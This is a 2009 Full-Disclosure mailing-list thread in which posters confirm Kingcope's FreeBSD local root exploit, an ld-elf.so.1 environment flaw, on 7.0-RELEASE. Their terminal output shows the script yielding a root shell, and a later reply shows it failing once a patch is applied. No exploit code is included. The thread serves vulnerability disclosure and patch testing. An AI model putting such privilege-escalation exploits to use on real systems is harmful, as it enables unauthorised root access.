On Tuesday 01 December 2009 06.45.38 bk wrote: > On Nov 30, 2009, at 9:25 PM, David Berard wrote: > >> 7.0 not vuln. > > > > 7.0 vulnerable here, > > > > $ ./env > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > /libexec/ld-elf.so.1: environment corrupt; missing value for > > ALEX-ALEX > > # uname -r > > 7.0-RELEASE-p3 > > Here as well: > > bin/Kingcope.sh: new file: 35 lines, 772 characters. > [ch...@demon ~]$ chmod +x bin/Kingcope.sh > [ch...@demon ~]$ Kingcope.sh > bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in function > 'malloc' env.c:9: warning: incompatible implicit declaration of built-in > function 'strcpy' env.c:11: warning: incompatible implicit declaration of > built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; > missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # whoami > root > # uname -a > FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 > 19:59:52 UTC 2008 > [email protected]:/usr/obj/usr/src/sys/GENERIC i386 > > It's a VM if that matters. > > -- > chort > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
with cpercivals patch: o...@oliverp exploit> ./local_root_exploit_env.sh local_root_exploit_env.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; aborting -- thanks, Oliver _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
